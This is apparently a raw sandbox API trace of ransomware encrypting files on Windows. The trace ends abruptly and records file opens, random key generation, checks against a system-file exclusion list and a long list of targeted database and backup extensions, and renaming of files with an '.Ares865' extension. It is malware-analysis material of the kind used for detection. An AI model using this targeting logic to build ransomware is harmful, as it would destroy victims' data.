(lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2796) returned 1 [0132.466] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.467] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdf0, lpName=0x0) returned 0x170 [0132.468] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdf0) returned 0x190000 [0132.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.470] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.470] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0132.470] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="aoldtz.exe") returned 1 [0132.470] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".") returned 1 [0132.470] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="..") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="windows") returned -1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="bootmgr") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="temp") returned -1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="pagefile.sys") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="boot") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="ids.txt") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="ntuser.dat") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="perflogs") returned 1 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2="MSBuild") returned 1 [0132.471] lstrlenW (lpString="psfontj2d.properties") returned 20 [0132.471] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja") returned 57 [0132.471] lstrcpyW (in: lpString1=0x2cce44a, lpString2="psfontj2d.properties" | out: lpString1="psfontj2d.properties") returned="psfontj2d.properties" [0132.471] lstrlenW (lpString="psfontj2d.properties") returned 20 [0132.471] lstrlenW (lpString="Ares865") returned 7 [0132.471] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0132.471] lstrlenW (lpString=".dll") returned 4 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".dll") returned 1 [0132.471] lstrlenW (lpString=".lnk") returned 4 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".lnk") returned 1 [0132.471] lstrlenW (lpString=".ini") returned 4 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".ini") returned 1 [0132.471] lstrlenW (lpString=".sys") returned 4 [0132.471] lstrcmpiW (lpString1="psfontj2d.properties", lpString2=".sys") returned 1 [0132.471] lstrlenW (lpString="psfontj2d.properties") returned 20 [0132.471] lstrcmpiW (lpString1="ies", lpString2="bak") returned 1 [0132.472] lstrcmpiW (lpString1="ies", lpString2="ba_") returned 1 [0132.472] lstrcmpiW (lpString1="ies", lpString2="dbb") returned 1 [0132.472] lstrcmpiW (lpString1="ties", lpString2="vmdk") returned -1 [0132.473] lstrcmpiW (lpString1="ies", lpString2="rar") returned -1 [0132.473] lstrcmpiW (lpString1="ies", lpString2="zip") returned -1 [0132.473] lstrcmpiW (lpString1="ies", lpString2="tgz") returned -1 [0132.473] lstrcmpiW (lpString1="ties", lpString2="vbox") returned -1 [0132.474] lstrcmpiW (lpString1="ies", lpString2="vdi") returned -1 [0132.474] lstrcmpiW (lpString1="ies", lpString2="vhd") returned -1 [0132.474] lstrcmpiW (lpString1="ties", lpString2="vhdx") returned -1 [0132.475] lstrcmpiW (lpString1="ties", lpString2="avhd") returned 1 [0132.475] lstrcmpiW (lpString1="es", lpString2="db") returned 1 [0132.475] lstrcmpiW (lpString1="ies", lpString2="db2") returned 1 [0132.475] lstrcmpiW (lpString1="ies", lpString2="db3") returned 1 [0132.476] lstrcmpiW (lpString1="ies", lpString2="dbf") returned 1 [0132.476] lstrcmpiW (lpString1="ies", lpString2="mdf") returned -1 [0132.476] lstrcmpiW (lpString1="ies", lpString2="mdb") returned -1 [0132.477] lstrcmpiW (lpString1="ies", lpString2="sql") returned -1 [0132.477] lstrcmpiW (lpString1="erties", lpString2="sqlite") returned -1 [0132.477] lstrcmpiW (lpString1="perties", lpString2="sqlite3") returned -1 [0132.477] lstrcmpiW (lpString1="operties", lpString2="sqlitedb") returned -1 [0132.478] lstrcmpiW (lpString1="ies", lpString2="xml") returned -1 [0132.478] lstrcmpiW (lpString1="ies", lpString2="$er") returned 1 [0132.478] lstrcmpiW (lpString1="ies", lpString2="4dd") returned 1 [0132.479] lstrcmpiW (lpString1="ies", lpString2="4dl") returned 1 [0132.479] lstrcmpiW (lpString1="ies", lpString2="^^^") returned 1 [0132.479] lstrcmpiW (lpString1="ies", lpString2="abs") returned 1 [0132.479] lstrcmpiW (lpString1="ies", lpString2="abx") returned 1 [0132.480] lstrcmpiW (lpString1="rties", lpString2="accdb") returned 1 [0132.480] lstrcmpiW (lpString1="rties", lpString2="accdc") returned 1 [0132.480] lstrcmpiW (lpString1="rties", lpString2="accde") returned 1 [0132.481] lstrcmpiW (lpString1="rties", lpString2="accdr") returned 1 [0132.481] lstrcmpiW (lpString1="rties", lpString2="accdt") returned 1 [0132.481] lstrcmpiW (lpString1="rties", lpString2="accdw") returned 1 [0132.481] lstrcmpiW (lpString1="rties", lpString2="accft") returned 1 [0132.482] lstrcmpiW (lpString1="ies", lpString2="adb") returned 1 [0132.482] lstrcmpiW (lpString1="ies", lpString2="adb") returned 1 [0132.482] lstrcmpiW (lpString1="ies", lpString2="ade") returned 1 [0132.483] lstrcmpiW (lpString1="ies", lpString2="adf") returned 1 [0132.483] lstrcmpiW (lpString1="ies", lpString2="adn") returned 1 [0132.483] lstrcmpiW (lpString1="ies", lpString2="adp") returned 1 [0132.483] lstrcmpiW (lpString1="ies", lpString2="alf") returned 1 [0132.484] lstrcmpiW (lpString1="ies", lpString2="ask") returned 1 [0132.484] lstrcmpiW (lpString1="ies", lpString2="btr") returned 1 [0132.484] lstrcmpiW (lpString1="ies", lpString2="cat") returned 1 [0132.485] lstrcmpiW (lpString1="ies", lpString2="cdb") returned 1 [0132.485] lstrcmpiW (lpString1="ies", lpString2="ckp") returned 1 [0132.485] lstrcmpiW (lpString1="ies", lpString2="cma") returned 1 [0132.486] lstrcmpiW (lpString1="ies", lpString2="cpd") returned 1 [0132.486] lstrcmpiW (lpString1="erties", lpString2="dacpac") returned 1 [0132.486] lstrcmpiW (lpString1="ies", lpString2="dad") returned 1 [0132.486] lstrcmpiW (lpString1="properties", lpString2="dadiagrams") returned 1 [0132.487] lstrcmpiW (lpString1="operties", lpString2="daschema") returned 1 [0132.487] lstrcmpiW (lpString1="properties", lpString2="db-journal") returned 1 [0132.487] lstrcmpiW (lpString1="erties", lpString2="db-shm") returned 1 [0132.488] lstrcmpiW (lpString1="erties", lpString2="db-wal") returned 1 [0132.488] lstrcmpiW (lpString1="ies", lpString2="dbc") returned 1 [0132.488] lstrcmpiW (lpString1="ies", lpString2="dbs") returned 1 [0132.488] lstrcmpiW (lpString1="ies", lpString2="dbt") returned 1 [0132.489] lstrcmpiW (lpString1="ies", lpString2="dbv") returned 1 [0132.489] lstrcmpiW (lpString1="ies", lpString2="dbx") returned 1 [0132.489] lstrcmpiW (lpString1="ies", lpString2="dcb") returned 1 [0132.489] lstrcmpiW (lpString1="ies", lpString2="dct") returned 1 [0132.490] lstrcmpiW (lpString1="ies", lpString2="dcx") returned 1 [0132.490] lstrcmpiW (lpString1="ies", lpString2="ddl") returned 1 [0132.490] lstrcmpiW (lpString1="ties", lpString2="dlis") returned 1 [0132.491] lstrcmpiW (lpString1="ies", lpString2="dp1") returned 1 [0132.491] lstrcmpiW (lpString1="ies", lpString2="dqy") returned 1 [0132.491] lstrcmpiW (lpString1="ies", lpString2="dsk") returned 1 [0132.491] lstrcmpiW (lpString1="ies", lpString2="dsn") returned 1 [0132.492] lstrcmpiW (lpString1="ties", lpString2="dtsx") returned 1 [0132.492] lstrcmpiW (lpString1="ies", lpString2="dxl") returned 1 [0132.492] lstrcmpiW (lpString1="ies", lpString2="eco") returned 1 [0132.493] lstrcmpiW (lpString1="ies", lpString2="ecx") returned 1 [0132.493] lstrcmpiW (lpString1="ies", lpString2="edb") returned 1 [0132.493] lstrcmpiW (lpString1="ties", lpString2="epim") returned 1 [0132.493] lstrcmpiW (lpString1="ies", lpString2="fcd") returned 1 [0132.494] lstrcmpiW (lpString1="ies", lpString2="fdb") returned 1 [0132.494] lstrcmpiW (lpString1="ies", lpString2="fic") returned 1 [0132.494] lstrcmpiW (lpString1="d.properties", lpString2="flexolibrary") returned -1 [0132.495] lstrcmpiW (lpString1="ies", lpString2="fm5") returned 1 [0132.495] lstrcmpiW (lpString1="ies", lpString2="fmp") returned 1 [0132.495] lstrcmpiW (lpString1="rties", lpString2="fmp12") returned 1 [0132.495] lstrcmpiW (lpString1="rties", lpString2="fmpsl") returned 1 [0132.496] lstrcmpiW (lpString1="ies", lpString2="fol") returned 1 [0132.496] lstrcmpiW (lpString1="ies", lpString2="fp3") returned 1 [0132.496] lstrcmpiW (lpString1="ies", lpString2="fp4") returned 1 [0132.497] lstrcmpiW (lpString1="ies", lpString2="fp5") returned 1 [0132.497] lstrcmpiW (lpString1="ies", lpString2="fp7") returned 1 [0132.497] lstrcmpiW (lpString1="ies", lpString2="fpt") returned 1 [0132.497] lstrcmpiW (lpString1="ies", lpString2="frm") returned 1 [0132.498] lstrcmpiW (lpString1="ies", lpString2="gdb") returned 1 [0132.498] lstrcmpiW (lpString1="ies", lpString2="gdb") returned 1 [0132.498] lstrcmpiW (lpString1="ties", lpString2="grdb") returned 1 [0132.499] lstrcmpiW (lpString1="ies", lpString2="gwi") returned 1 [0132.499] lstrcmpiW (lpString1="ies", lpString2="hdb") returned 1 [0132.499] lstrcmpiW (lpString1="ies", lpString2="his") returned 1 [0132.499] lstrcmpiW (lpString1="es", lpString2="ib") returned -1 [0132.500] lstrcmpiW (lpString1="ies", lpString2="idb") returned 1 [0132.500] lstrcmpiW (lpString1="ies", lpString2="ihx") returned -1 [0132.500] lstrcmpiW (lpString1="ties", lpString2="itdb") returned 1 [0132.501] lstrcmpiW (lpString1="ies", lpString2="itw") returned -1 [0132.501] lstrcmpiW (lpString1="ies", lpString2="jet") returned -1 [0132.501] lstrcmpiW (lpString1="ies", lpString2="jtx") returned -1 [0132.502] lstrcmpiW (lpString1="ies", lpString2="kdb") returned -1 [0132.502] lstrcmpiW (lpString1="ties", lpString2="kexi") returned 1 [0132.502] lstrcmpiW (lpString1="rties", lpString2="kexic") returned 1 [0132.503] lstrcmpiW (lpString1="rties", lpString2="kexis") returned 1 [0132.503] lstrcmpiW (lpString1="ies", lpString2="lgc") returned -1 [0132.503] lstrcmpiW (lpString1="ies", lpString2="lwx") returned -1 [0132.503] lstrcmpiW (lpString1="ies", lpString2="maf") returned -1 [0132.504] lstrcmpiW (lpString1="ies", lpString2="maq") returned -1 [0132.504] lstrcmpiW (lpString1="ies", lpString2="mar") returned -1 [0132.504] lstrcmpiW (lpString1="perties", lpString2="marshal") returned 1 [0132.505] lstrcmpiW (lpString1="ies", lpString2="mas") returned -1 [0132.505] lstrcmpiW (lpString1="ies", lpString2="mav") returned -1 [0132.505] lstrcmpiW (lpString1="ies", lpString2="maw") returned -1 [0132.505] lstrcmpiW (lpString1="perties", lpString2="mdbhtml") returned 1 [0132.506] lstrcmpiW (lpString1="ies", lpString2="mdn") returned -1 [0132.506] lstrcmpiW (lpString1="ies", lpString2="mdt") returned -1 [0132.506] lstrcmpiW (lpString1="ies", lpString2="mfd") returned -1 [0132.507] lstrcmpiW (lpString1="ies", lpString2="mpd") returned -1 [0132.507] lstrcmpiW (lpString1="ies", lpString2="mrg") returned -1 [0132.507] lstrcmpiW (lpString1="ies", lpString2="mud") returned -1 [0132.507] lstrcmpiW (lpString1="ies", lpString2="mwb") returned -1 [0132.508] lstrcmpiW (lpString1="ies", lpString2="myd") returned -1 [0132.508] lstrcmpiW (lpString1="ies", lpString2="ndf") returned -1 [0132.508] lstrcmpiW (lpString1="ies", lpString2="nnt") returned -1 [0132.509] lstrcmpiW (lpString1="erties", lpString2="nrmlib") returned -1 [0132.509] lstrcmpiW (lpString1="ies", lpString2="ns2") returned -1 [0132.509] lstrcmpiW (lpString1="ies", lpString2="ns3") returned -1 [0132.509] lstrcmpiW (lpString1="ies", lpString2="ns4") returned -1 [0132.510] lstrcmpiW (lpString1="ies", lpString2="nsf") returned -1 [0132.510] lstrcmpiW (lpString1="es", lpString2="nv") returned -1 [0132.510] lstrcmpiW (lpString1="ies", lpString2="nv2") returned -1 [0132.511] lstrcmpiW (lpString1="ties", lpString2="nwdb") returned 1 [0132.511] lstrcmpiW (lpString1="ies", lpString2="nyf") returned -1 [0132.511] lstrcmpiW (lpString1="ies", lpString2="odb") returned -1 [0132.511] lstrcmpiW (lpString1="ies", lpString2="odb") returned -1 [0132.512] lstrcmpiW (lpString1="ies", lpString2="oqy") returned -1 [0132.512] lstrcmpiW (lpString1="ies", lpString2="ora") returned -1 [0132.512] lstrcmpiW (lpString1="ies", lpString2="orx") returned -1 [0132.513] lstrcmpiW (lpString1="ies", lpString2="owc") returned -1 [0132.513] lstrcmpiW (lpString1="ies", lpString2="p96") returned -1 [0132.513] lstrcmpiW (lpString1="ies", lpString2="p97") returned -1 [0132.513] lstrcmpiW (lpString1="ies", lpString2="pan") returned -1 [0132.514] lstrcmpiW (lpString1="ies", lpString2="pdb") returned -1 [0132.514] lstrcmpiW (lpString1="ies", lpString2="pdm") returned -1 [0132.514] lstrcmpiW (lpString1="ies", lpString2="pnz") returned -1 [0132.515] lstrcmpiW (lpString1="ies", lpString2="qry") returned -1 [0132.515] lstrcmpiW (lpString1="ies", lpString2="qvd") returned -1 [0132.515] lstrcmpiW (lpString1="ies", lpString2="rbf") returned -1 [0132.515] lstrcmpiW (lpString1="ties", lpString2="rctd") returned 1 [0132.516] lstrcmpiW (lpString1="ies", lpString2="rod") returned -1 [0132.516] lstrcmpiW (lpString1="ties", lpString2="rodx") returned 1 [0132.525] lstrcmpiW (lpString1="ies", lpString2="rpd") returned -1 [0132.529] lstrcmpiW (lpString1="ies", lpString2="rsd") returned -1 [0132.529] lstrcmpiW (lpString1="operties", lpString2="sas7bdat") returned -1 [0132.529] lstrcmpiW (lpString1="ies", lpString2="sbf") returned -1 [0132.529] lstrcmpiW (lpString1="ies", lpString2="scx") returned -1 [0132.530] lstrcmpiW (lpString1="ies", lpString2="sdb") returned -1 [0132.530] lstrcmpiW (lpString1="ies", lpString2="sdc") returned -1 [0132.530] lstrcmpiW (lpString1="ies", lpString2="sdf") returned -1 [0132.531] lstrcmpiW (lpString1="ies", lpString2="sis") returned -1 [0132.531] lstrcmpiW (lpString1="ies", lpString2="spq") returned -1 [0132.531] lstrcmpiW (lpString1="es", lpString2="te") returned -1 [0132.531] lstrcmpiW (lpString1="perties", lpString2="teacher") returned -1 [0132.532] lstrcmpiW (lpString1="ies", lpString2="tmd") returned -1 [0132.532] lstrcmpiW (lpString1="ies", lpString2="tps") returned -1 [0132.532] lstrcmpiW (lpString1="ies", lpString2="trc") returned -1 [0132.533] lstrcmpiW (lpString1="ies", lpString2="trc") returned -1 [0132.533] lstrcmpiW (lpString1="ies", lpString2="trm") returned -1 [0132.533] lstrcmpiW (lpString1="ies", lpString2="udb") returned -1 [0132.533] lstrcmpiW (lpString1="ies", lpString2="udl") returned -1 [0132.534] lstrcmpiW (lpString1="ies", lpString2="usr") returned -1 [0132.534] lstrcmpiW (lpString1="ies", lpString2="v12") returned -1 [0132.534] lstrcmpiW (lpString1="ies", lpString2="vis") returned -1 [0132.535] lstrcmpiW (lpString1="ies", lpString2="vpd") returned -1 [0132.535] lstrcmpiW (lpString1="ies", lpString2="vvv") returned -1 [0132.535] lstrcmpiW (lpString1="ies", lpString2="wdb") returned -1 [0132.535] lstrcmpiW (lpString1="ties", lpString2="wmdb") returned -1 [0132.536] lstrcmpiW (lpString1="ies", lpString2="wrk") returned -1 [0132.536] lstrcmpiW (lpString1="ies", lpString2="xdb") returned -1 [0132.536] lstrcmpiW (lpString1="ies", lpString2="xld") returned -1 [0132.537] lstrcmpiW (lpString1="rties", lpString2="xmlff") returned -1 [0132.537] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.Ares865") returned 65 [0132.537] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties.ares865"), dwFlags=0x1) returned 1 [0132.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.568] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10393) returned 1 [0132.568] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.569] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.569] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.569] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2ba0, lpName=0x0) returned 0x170 [0132.571] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2ba0) returned 0x190000 [0132.577] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="aoldtz.exe") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2=".") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="..") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="windows") returned -1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="bootmgr") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="temp") returned -1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="pagefile.sys") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="boot") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="ids.txt") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="ntuser.dat") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="perflogs") returned 1 [0132.579] lstrcmpiW (lpString1="resources.jar", lpString2="MSBuild") returned 1 [0132.579] lstrlenW (lpString="resources.jar") returned 13 [0132.579] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties") returned 57 [0132.579] lstrcpyW (in: lpString1=0x2cce44a, lpString2="resources.jar" | out: lpString1="resources.jar") returned="resources.jar" [0132.579] lstrlenW (lpString="resources.jar") returned 13 [0132.580] lstrlenW (lpString="Ares865") returned 7 [0132.580] lstrcmpiW (lpString1="ces.jar", lpString2="Ares865") returned 1 [0132.580] lstrlenW (lpString=".dll") returned 4 [0132.580] lstrcmpiW (lpString1="resources.jar", lpString2=".dll") returned 1 [0132.580] lstrlenW (lpString=".lnk") returned 4 [0132.580] lstrcmpiW (lpString1="resources.jar", lpString2=".lnk") returned 1 [0132.580] lstrlenW (lpString=".ini") returned 4 [0132.580] lstrcmpiW (lpString1="resources.jar", lpString2=".ini") returned 1 [0132.580] lstrlenW (lpString=".sys") returned 4 [0132.580] lstrcmpiW (lpString1="resources.jar", lpString2=".sys") returned 1 [0132.580] lstrlenW (lpString="resources.jar") returned 13 [0132.580] lstrlenW (lpString="bak") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="bak") returned 1 [0132.580] lstrlenW (lpString="ba_") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="ba_") returned 1 [0132.580] lstrlenW (lpString="dbb") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="dbb") returned 1 [0132.580] lstrlenW (lpString="vmdk") returned 4 [0132.580] lstrcmpiW (lpString1=".jar", lpString2="vmdk") returned -1 [0132.580] lstrlenW (lpString="rar") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="rar") returned -1 [0132.580] lstrlenW (lpString="zip") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="zip") returned -1 [0132.580] lstrlenW (lpString="tgz") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="tgz") returned -1 [0132.580] lstrlenW (lpString="vbox") returned 4 [0132.580] lstrcmpiW (lpString1=".jar", lpString2="vbox") returned -1 [0132.580] lstrlenW (lpString="vdi") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="vdi") returned -1 [0132.580] lstrlenW (lpString="vhd") returned 3 [0132.580] lstrcmpiW (lpString1="jar", lpString2="vhd") returned -1 [0132.580] lstrlenW (lpString="vhdx") returned 4 [0132.580] lstrcmpiW (lpString1=".jar", lpString2="vhdx") returned -1 [0132.580] lstrlenW (lpString="avhd") returned 4 [0132.580] lstrcmpiW (lpString1=".jar", lpString2="avhd") returned -1 [0132.580] lstrlenW (lpString="db") returned 2 [0132.580] lstrcmpiW (lpString1="ar", lpString2="db") returned -1 [0132.581] lstrlenW (lpString="db2") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="db2") returned 1 [0132.581] lstrlenW (lpString="db3") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="db3") returned 1 [0132.581] lstrlenW (lpString="dbf") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="dbf") returned 1 [0132.581] lstrlenW (lpString="mdf") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="mdf") returned -1 [0132.581] lstrlenW (lpString="mdb") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="mdb") returned -1 [0132.581] lstrlenW (lpString="sql") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="sql") returned -1 [0132.581] lstrlenW (lpString="sqlite") returned 6 [0132.581] lstrcmpiW (lpString1="es.jar", lpString2="sqlite") returned -1 [0132.581] lstrlenW (lpString="sqlite3") returned 7 [0132.581] lstrcmpiW (lpString1="ces.jar", lpString2="sqlite3") returned -1 [0132.581] lstrlenW (lpString="sqlitedb") returned 8 [0132.581] lstrcmpiW (lpString1="rces.jar", lpString2="sqlitedb") returned -1 [0132.581] lstrlenW (lpString="xml") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="xml") returned -1 [0132.581] lstrlenW (lpString="$er") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="$er") returned 1 [0132.581] lstrlenW (lpString="4dd") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="4dd") returned 1 [0132.581] lstrlenW (lpString="4dl") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="4dl") returned 1 [0132.581] lstrlenW (lpString="^^^") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="^^^") returned 1 [0132.581] lstrlenW (lpString="abs") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="abs") returned 1 [0132.581] lstrlenW (lpString="abx") returned 3 [0132.581] lstrcmpiW (lpString1="jar", lpString2="abx") returned 1 [0132.581] lstrlenW (lpString="accdb") returned 5 [0132.581] lstrcmpiW (lpString1="s.jar", lpString2="accdb") returned 1 [0132.581] lstrlenW (lpString="accdc") returned 5 [0132.581] lstrcmpiW (lpString1="s.jar", lpString2="accdc") returned 1 [0132.581] lstrlenW (lpString="accde") returned 5 [0132.582] lstrcmpiW (lpString1="s.jar", lpString2="accde") returned 1 [0132.582] lstrlenW (lpString="accdr") returned 5 [0132.582] lstrcmpiW (lpString1="s.jar", lpString2="accdr") returned 1 [0132.582] lstrlenW (lpString="accdt") returned 5 [0132.582] lstrcmpiW (lpString1="s.jar", lpString2="accdt") returned 1 [0132.582] lstrlenW (lpString="accdw") returned 5 [0132.582] lstrcmpiW (lpString1="s.jar", lpString2="accdw") returned 1 [0132.582] lstrlenW (lpString="accft") returned 5 [0132.582] lstrcmpiW (lpString1="s.jar", lpString2="accft") returned 1 [0132.582] lstrlenW (lpString="adb") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="adb") returned 1 [0132.582] lstrlenW (lpString="adb") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="adb") returned 1 [0132.582] lstrlenW (lpString="ade") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="ade") returned 1 [0132.582] lstrlenW (lpString="adf") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="adf") returned 1 [0132.582] lstrlenW (lpString="adn") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="adn") returned 1 [0132.582] lstrlenW (lpString="adp") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="adp") returned 1 [0132.582] lstrlenW (lpString="alf") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="alf") returned 1 [0132.582] lstrlenW (lpString="ask") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="ask") returned 1 [0132.582] lstrlenW (lpString="btr") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="btr") returned 1 [0132.582] lstrlenW (lpString="cat") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="cat") returned 1 [0132.582] lstrlenW (lpString="cdb") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="cdb") returned 1 [0132.582] lstrlenW (lpString="ckp") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="ckp") returned 1 [0132.582] lstrlenW (lpString="cma") returned 3 [0132.582] lstrcmpiW (lpString1="jar", lpString2="cma") returned 1 [0132.582] lstrlenW (lpString="cpd") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="cpd") returned 1 [0132.583] lstrlenW (lpString="dacpac") returned 6 [0132.583] lstrcmpiW (lpString1="es.jar", lpString2="dacpac") returned 1 [0132.583] lstrlenW (lpString="dad") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dad") returned 1 [0132.583] lstrlenW (lpString="dadiagrams") returned 10 [0132.583] lstrcmpiW (lpString1="ources.jar", lpString2="dadiagrams") returned 1 [0132.583] lstrlenW (lpString="daschema") returned 8 [0132.583] lstrcmpiW (lpString1="rces.jar", lpString2="daschema") returned 1 [0132.583] lstrlenW (lpString="db-journal") returned 10 [0132.583] lstrcmpiW (lpString1="ources.jar", lpString2="db-journal") returned 1 [0132.583] lstrlenW (lpString="db-shm") returned 6 [0132.583] lstrcmpiW (lpString1="es.jar", lpString2="db-shm") returned 1 [0132.583] lstrlenW (lpString="db-wal") returned 6 [0132.583] lstrcmpiW (lpString1="es.jar", lpString2="db-wal") returned 1 [0132.583] lstrlenW (lpString="dbc") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dbc") returned 1 [0132.583] lstrlenW (lpString="dbs") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dbs") returned 1 [0132.583] lstrlenW (lpString="dbt") returned 3 [0132.583] lstrcmpiW (lpString1="jar", lpString2="dbt") returned 